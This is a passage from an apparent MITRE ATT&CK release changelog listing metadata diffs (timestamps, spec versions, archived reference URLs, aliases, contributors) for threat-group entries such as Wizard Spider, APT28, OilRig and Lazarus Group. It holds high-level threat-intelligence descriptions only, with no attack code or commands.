| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-25 14:28:10.337000+00:00 | 2025-04-16 20:37:40.731000+00:00 |
[G0036] GCMAN
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 19:03:44.853000+00:00 | 2025-04-16 20:37:40.552000+00:00 |
[G0115] GOLD SOUTHFIELD
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-28 20:49:53.223000+00:00 | 2025-04-16 20:37:38.397000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G0084] Gallmaker
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 19:04:47.798000+00:00 | 2025-04-16 20:37:40.106000+00:00 |
[G0078] Gorgon Group
Current version: 1.5
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-12 21:57:25.847000+00:00 | 2025-04-16 20:37:36.314000+00:00 |
[G0136] IndigoZebra
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-16 02:06:06.404000+00:00 | 2025-04-16 20:37:41.185000+00:00 |
[G0140] LazyScripter
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-22 04:49:29.731000+00:00 | 2024-11-17 14:12:07.294000+00:00 |
| external_references[2]['description'] | Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 24, 2021. | Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf | https://web.archive.org/web/20211003035156/https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G0077] Leafminer
Current version: 2.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-22 04:50:51.782000+00:00 | 2025-04-16 20:37:33.912000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G1014] LuminousMoth
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-17 21:49:16.371000+00:00 | 2025-04-16 20:37:32.806000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G0095] Machete
Current version: 2.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-06 19:26:47.988000+00:00 | 2025-04-16 20:37:37.929000+00:00 |
[G0059] Magic Hound
Current version: 6.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-07-10 18:56:00.833000+00:00 | 2024-11-17 16:17:26.385000+00:00 |
| external_references[19]['description'] | Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018. | Mandiant. (2018). Mandiant M-Trends 2018. Retrieved November 17, 2024. |
| external_references[19]['url'] | https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf | https://static.carahsoft.com/concrete/files/1015/2779/3571/M-Trends-2018-Report.pdf |
[G0002] Moafee
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 19:09:42.298000+00:00 | 2025-04-16 20:37:41.833000+00:00 |
[G0021] Molerats
Current version: 2.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-11 00:40:46.966000+00:00 | 2024-11-17 15:50:27.600000+00:00 |
| external_references[8]['description'] | Villeneuve, N., Haq, H., Moran, N. (2013, August 23). OPERATION MOLERATS: MIDDLE EAST CYBER ATTACKS USING POISON IVY. Retrieved April 1, 2016. | Villeneuve, N., Haq, H., Moran, N. (2013, August 23). OPERATION MOLERATS: MIDDLE EAST CYBER ATTACKS USING POISON IVY. Retrieved November 17, 2024. |
| external_references[8]['url'] | https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html | https://web.archive.org/web/20201031075438/https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html |
[G1019] MoustachedBouncer
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-26 14:34:08.342000+00:00 | 2025-04-16 20:37:40.255000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G0129] Mustang Panda
Current version: 2.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-22 22:01:13.781000+00:00 | 2025-04-16 20:37:34.723000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G0055] NEODYMIUM
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2019-03-25 14:31:40.855000+00:00 | 2025-04-16 20:37:41.988000+00:00 |
[G0019] Naikon
Current version: 2.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-08-19 18:23:23.507000+00:00 | 2025-04-16 20:37:37.579000+00:00 |
[G0133] Nomadic Octopus
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-09-02 18:03:55.294000+00:00 | 2025-04-16 20:37:36.955000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[G0068] PLATINUM
Current version: 1.3
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-22 00:39:49.529000+00:00 | 2025-04-16 20:37:35.512000+00:00 |
[G0040] Patchwork
Current version: 1.5
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-22 05:08:20.780000+00:00 | 2024-11-17 23:51:01.110000+00:00 |
| external_references[5]['description'] | Cymmetria. (2016). Unveiling Patchwork - The Copy-Paste APT. Retrieved August 3, 2016. | Cymmetria. (2016). Unveiling Patchwork - The Copy-Paste APT. Retrieved November 17, 2024. |
| external_references[5]['url'] | https://web.archive.org/web/20180825085952/https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf | https://web.archive.org/web/20180825085952/https:/s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf |
| external_references[6]['description'] | Fagerland, S., et al. (2013, May). Operation Hangover: Unveiling an Indian Cyberattack Infrastructure. Retrieved September 26, 2016. | Fagerland, S., et al. (2013, May). Operation Hangover: Unveiling an Indian Cyberattack Infrastructure. Retrieved November 17, 2024. |
| external_references[6]['url'] | http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf | https://web.archive.org/web/20140424084220/http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G0011] PittyTiger
Current version: 1.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-12 23:11:41.368000+00:00 | 2025-04-16 20:37:40.885000+00:00 |
[G0033] Poseidon Group
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-18 20:25:54.945000+00:00 | 2025-04-16 20:37:39.948000+00:00 |
[G0024] Putter Panda
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-11 00:24:27.983000+00:00 | 2024-11-17 16:43:16.049000+00:00 |
| external_references[5]['description'] | Gross, J. and Walter, J.. (2016, January 12). Puttering into the Future.... Retrieved January 22, 2016. | Gross, J. and Walter, J.. (2016, January 12). Puttering into the Future.... Retrieved November 17, 2024. |
| external_references[5]['url'] | http://blog.cylance.com/puttering-into-the-future | https://blogs.blackberry.com/en/2016/01/puttering-into-the-future |
[G0048] RTM
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-05-12 22:16:44.650000+00:00 | 2025-04-16 20:37:34.877000+00:00 |
[G0106] Rocke
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-06-19 20:41:21.215000+00:00 | 2025-04-16 20:37:36.004000+00:00 |
[G0029] Scarlet Mimic
Current version: 1.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 19:16:53.144000+00:00 | 2025-04-16 20:37:41.499000+00:00 |
[G1008] SideCopy
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 18:51:09.213000+00:00 | 2025-04-16 20:37:38.248000+00:00 |
| x_mitre_attack_spec_version | 3.0.0 | 3.2.0 |
[G0091] Silence
Current version: 2.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-22 05:34:46.346000+00:00 | 2024-11-17 18:19:52.955000+00:00 |
| external_references[5]['description'] | Skulkin, O.. (2019, January 20). Silence: Dissecting Malicious CHM Files and Performing Forensic Analysis. Retrieved May 24, 2019. | Skulkin, O.. (2019, January 20). Silence: Dissecting Malicious CHM Files and Performing Forensic Analysis. Retrieved November 17, 2024. |
| external_references[5]['url'] | https://cyberforensicator.com/2019/01/20/silence-dissecting-malicious-chm-files-and-performing-forensic-analysis/ | https://web.archive.org/web/20220119133748/https://cyberforensicator.com/2019/01/20/silence-dissecting-malicious-chm-files-and-performing-forensic-analysis/ |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G0122] Silent Librarian
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-21 12:02:00.278000+00:00 | 2025-04-16 20:37:39.188000+00:00 |
[G0054] Sowbug
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 02:46:16.483000+00:00 | 2025-04-16 20:37:37.765000+00:00 |
[G0038] Stealth Falcon
Current version: 1.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-11-23 18:57:19.208000+00:00 | 2025-04-16 20:37:35.038000+00:00 |
[G0041] Strider
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-06-29 01:43:19.374000+00:00 | 2025-04-16 20:37:41.346000+00:00 |
[G0039] Suckfly
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-15 16:27:38.682000+00:00 | 2025-04-16 20:37:33.565000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[G0062] TA459
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 19:22:32.962000+00:00 | 2025-04-16 20:37:37.273000+00:00 |
[G0127] TA551
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-22 05:40:21.255000+00:00 | 2025-04-16 20:37:36.634000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G0089] The White Company
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 19:24:52.290000+00:00 | 2025-04-16 20:37:39.790000+00:00 |
[G0028] Threat Group-1314
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-19 21:58:20.831000+00:00 | 2025-04-16 20:37:35.353000+00:00 |
[G0076] Thrip
Current version: 1.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-12 20:13:42.274000+00:00 | 2025-04-16 20:37:40.404000+00:00 |
[G0131] Tonto Team
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-01-27 17:51:41.433000+00:00 | 2024-11-17 16:30:03.375000+00:00 |
| external_references[8]['description'] | Nalani Fraser, Kelli Vanderlee. (2019, October 10). Achievement Unlocked - Chinese Cyber Espionage Evolves to Support Higher Level Missions. Retrieved October 17, 2021. | Nalani Fraser, Kelli Vanderlee. (2019, October 10). Achievement Unlocked - Chinese Cyber Espionage Evolves to Support Higher Level Missions. Retrieved November 17, 2024. |
| external_references[8]['url'] | https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf | https://web.archive.org/web/20210308054208/https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf |
[G0123] Volatile Cedar
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-20 20:08:15.870000+00:00 | 2025-04-16 20:37:38.546000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[G0090] WIRTE
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-15 19:50:19.478000+00:00 | 2025-04-16 20:37:32.959000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[G0124] Windigo
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-26 22:32:57.046000+00:00 | 2025-04-16 20:37:36.164000+00:00 |
[G0112] Windshift
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-26 14:37:33.234000+00:00 | 2024-11-17 14:15:51.850000+00:00 |
| external_references[2]['description'] | Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020. | Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf | https://www.scribd.com/document/661837258/WINDSHIFT-summit-archive-1554718868 |
[G0044] Winnti Group
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 22:02:53.982000+00:00 | 2025-04-16 20:37:35.689000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G0102] Wizard Spider
Current version: 4.0
|
|
|---|
| t | [Wizard Spider](https://attack.mitre.org/groups/G0102) is a | t | [Wizard Spider](https://attack.mitre.org/groups/G0102) is a |
| Russia-based financially motivated threat group originally k | | Russia-based financially motivated threat group originally k |
| nown for the creation and deployment of [TrickBot](https://a | | nown for the creation and deployment of [TrickBot](https://a |
| ttack.mitre.org/software/S0266) since at least 2016. [Wizard | | ttack.mitre.org/software/S0266) since at least 2016. [Wizard |
| Spider](https://attack.mitre.org/groups/G0102) possesses a | | Spider](https://attack.mitre.org/groups/G0102) possesses a |
| diverse aresenal of tools and has conducted ransomware campa | | diverse arsenal of tools and has conducted ransomware campai |
| igns against a variety of organizations, ranging from major | | gns against a variety of organizations, ranging from major c |
| corporations to hospitals.(Citation: CrowdStrike Ryuk Januar | | orporations to hospitals.(Citation: CrowdStrike Ryuk January |
| y 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare O | | 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare Oc |
| ctober 2020)(Citation: CrowdStrike Wizard Spider October 202 | | tober 2020)(Citation: CrowdStrike Wizard Spider October 2020 |
| 0) | | ) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-03 20:21:34.872000+00:00 | 2025-03-12 20:33:21.597000+00:00 |
| description | [Wizard Spider](https://attack.mitre.org/groups/G0102) is a Russia-based financially motivated threat group originally known for the creation and deployment of [TrickBot](https://attack.mitre.org/software/S0266) since at least 2016. [Wizard Spider](https://attack.mitre.org/groups/G0102) possesses a diverse aresenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals.(Citation: CrowdStrike Ryuk January 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: CrowdStrike Wizard Spider October 2020) | [Wizard Spider](https://attack.mitre.org/groups/G0102) is a Russia-based financially motivated threat group originally known for the creation and deployment of [TrickBot](https://attack.mitre.org/software/S0266) since at least 2016. [Wizard Spider](https://attack.mitre.org/groups/G0102) possesses a diverse arsenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals.(Citation: CrowdStrike Ryuk January 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: CrowdStrike Wizard Spider October 2020) |
[G0018] admin@338
Current version: 1.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-18 19:54:59.120000+00:00 | 2025-04-16 20:37:33.261000+00:00 |
[G0045] menuPass
Current version: 3.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-19 14:30:03.922000+00:00 | 2024-11-17 23:19:12.450000+00:00 |
| external_references[12]['description'] | Crowdstrike. (2013, October 16). CrowdCasts Monthly: You Have an Adversary Problem. Retrieved March 1, 2017. | Crowdstrike. (2013, October 16). CrowdCasts Monthly: You Have an Adversary Problem. Retrieved November 17, 2024. |
| external_references[12]['url'] | https://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem | https://www.slideshare.net/slideshow/crowd-casts-monthly-you-have-an-adversary-problem/27262315 |
mobile-attack
New Groups
[G0096] APT41
Current version: 4.1
Description:
APT41 is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, APT41 has been observed targeting various industries, including but not limited to healthcare, telecom, technology, finance, education, retail and video game industries in 14 countries.(Citation: apt41_mandiant) Notable behaviors include using a wide range of malware and tools to complete mission objectives. APT41 overlaps at least partially with public reporting on groups including BARIUM and Winnti Group.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
[G1004] LAPSUS$
Current version: 2.1
Description:
LAPSUS$ is cyber criminal threat group that has been active since at least mid-2021. LAPSUS$ specializes in large-scale social engineering and extortion operations, including destructive attacks without the use of ransomware. The group has targeted organizations globally, including in the government, manufacturing, higher education, energy, healthcare, technology, telecommunications, and media sectors.(Citation: BBC LAPSUS Apr 2022)(Citation: MSTIC DEV-0537 Mar 2022)(Citation: UNIT 42 LAPSUS Mar 2022)
Minor Version Changes
[G0007] APT28
Current version: 5.2
Version changed from: 5.1 → 5.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-10 14:31:01.968000+00:00 | 2025-03-10 20:15:06.958000+00:00 |
| external_references[22]['description'] | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017. | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved November 17, 2024. |
| external_references[22]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf | https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf |
| external_references[33]['description'] | Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018. | Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved November 17, 2024. |
| external_references[33]['url'] | https://www.justice.gov/file/1080281/download | https://cdn.cnn.com/cnn/2018/images/07/13/gru.indictment.pdf |
| x_mitre_version | 5.1 | 5.2 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| aliases | | GruesomeLarch |
| external_references | | {'source_name': 'GruesomeLarch', 'description': '(Citation: Nearest Neighbor Volexity)'} |
| external_references | | {'source_name': 'Nearest Neighbor Volexity', 'description': 'Koessel, Sean. Adair, Steven. Lancaster, Tom. (2024, November 22). The Nearest Neighbor Attack: How A Russian APT Weaponized Nearby Wi-Fi Networks for Covert Access. Retrieved February 25, 2025.', 'url': 'https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/'} |
[G0034] Sandworm Team
Current version: 4.2
Version changed from: 4.1 → 4.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 17:37:44.040000+00:00 | 2024-12-04 21:17:08.593000+00:00 |
| x_mitre_version | 4.1 | 4.2 |
Patches
[G1028] APT-C-23
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-16 15:31:48.747000+00:00 | 2024-11-17 20:01:55.806000+00:00 |
| external_references[7]['description'] | Flossman, M., Scott, M. (2021, April). Technical Paper // Taking Action Against Arid Viper. Retrieved March 4, 2024. | Flossman, M., Scott, M. (2021, April). Technical Paper // Taking Action Against Arid Viper. Retrieved November 17, 2024. |
| external_references[7]['url'] | https://web.archive.org/web/20231126111812/https://about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf | https://web.archive.org/web/20231126111812/https:/about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf |
[G0097] Bouncing Golf
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-26 20:58:44.722000+00:00 | 2025-04-16 21:22:02.103000+00:00 |
[G0142] Confucius
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-22 20:43:16.504000+00:00 | 2025-04-16 20:37:36.476000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G1019] MoustachedBouncer
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-26 14:34:08.342000+00:00 | 2025-04-16 20:37:40.255000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G0112] Windshift
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-26 14:37:33.234000+00:00 | 2024-11-17 14:15:51.850000+00:00 |
| external_references[2]['description'] | Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020. | Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf | https://www.scribd.com/document/661837258/WINDSHIFT-summit-archive-1554718868 |
ics-attack
Major Version Changes
[G0049] OilRig
Current version: 5.0
Version changed from: 4.1 → 5.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-04 20:33:04.739000+00:00 | 2025-01-16 18:55:49.463000+00:00 |
| x_mitre_version | 4.1 | 5.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| aliases | | Earth Simnavaz |
| aliases | | Crambus |
| aliases | | TA452 |
| external_references | | {'source_name': 'TA452', 'description': '(Citation: Proofpoint Iranian Aligned Attacks JAN 2020)'} |
| external_references | | {'source_name': 'Crambus', 'description': '(Citation: Symantec Crambus OCT 2023)'} |
| external_references | | {'source_name': 'Earth Simnavaz', 'description': '(Citation: Trend Micro Earth Simnavaz October 2024)'} |
| external_references | | {'source_name': 'Trend Micro Earth Simnavaz October 2024', 'description': 'Fahmy, M. et al. (2024, October 11). Earth Simnavaz (aka APT34) Levies Advanced Cyberattacks Against Middle East. Retrieved November 27, 2024.', 'url': 'https://www.trendmicro.com/en_us/research/24/j/earth-simnavaz-cyberattacks.html'} |
| external_references | | {'source_name': 'Proofpoint Iranian Aligned Attacks JAN 2020', 'description': 'Proofpoint. (2020, January 10). Iranian State-Sponsored and Aligned Attacks: What You Need to Know and Steps to Protect Yourself. Retrieved January 16, 2025.', 'url': 'https://www.proofpoint.com/us/corporate-blog/post/iranian-state-sponsored-and-aligned-attacks-what-you-need-know-and-steps-protect'} |
| external_references | | {'source_name': 'Symantec Crambus OCT 2023', 'description': 'Symantec Threat Hunter Team. (2023, October 19). Crambus: New Campaign Targets Middle Eastern Government. Retrieved November 27, 2024.', 'url': 'https://www.security.com/threat-intelligence/crambus-middle-east-government'} |
| x_mitre_contributors | | Jaesang Oh, KC7 Foundation |
Minor Version Changes
[G0082] APT38
Current version: 3.1
Version changed from: 3.0 → 3.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_contributors | | ['Hiroki Nagahama, NEC Corporation', 'Manikantan Srinivasan, NEC Corporation India', 'Pooja Natarajan, NEC Corporation India'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-08-26 16:33:33.984000+00:00 | 2025-01-22 21:54:11.727000+00:00 |
| external_references[11]['description'] | FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018. | FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 17, 2024. |
| x_mitre_version | 3.0 | 3.1 |
[G0032] Lazarus Group
Current version: 4.1
Version changed from: 4.0 → 4.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-11 16:06:34.699000+00:00 | 2025-04-16 17:21:11.622000+00:00 |
| x_mitre_version | 4.0 | 4.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_contributors | | MyungUk Han, ASEC |
| x_mitre_contributors | | Jun Hirata, NEC Corporation |
| x_mitre_contributors | | Manikantan Srinivasan, NEC Corporation India |
| x_mitre_contributors | | Pooja Natarajan, NEC Corporation India |
[G0034] Sandworm Team
Current version: 4.2
Version changed from: 4.1 → 4.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 17:37:44.040000+00:00 | 2024-12-04 21:17:08.593000+00:00 |
| x_mitre_version | 4.1 | 4.2 |
Patches
[G1000] ALLANITE
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-05-24 19:26:10.721000+00:00 | 2025-04-16 21:26:23.407000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[G0037] FIN6
Current version: 4.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-01-08 22:13:27.588000+00:00 | 2024-11-17 14:59:25.749000+00:00 |
| external_references[8]['description'] | FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016. | FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved November 17, 2024. |
| external_references[8]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf | https://web.archive.org/web/20190807112824/https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf |
[G0115] GOLD SOUTHFIELD
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-28 20:49:53.223000+00:00 | 2025-04-16 20:37:38.397000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G0102] Wizard Spider
Current version: 4.0
|
|
|---|
| t | [Wizard Spider](https://attack.mitre.org/groups/G0102) is a | t | [Wizard Spider](https://attack.mitre.org/groups/G0102) is a |
| Russia-based financially motivated threat group originally k | | Russia-based financially motivated threat group originally k |
| nown for the creation and deployment of [TrickBot](https://a | | nown for the creation and deployment of [TrickBot](https://a |
| ttack.mitre.org/software/S0266) since at least 2016. [Wizard | | ttack.mitre.org/software/S0266) since at least 2016. [Wizard |
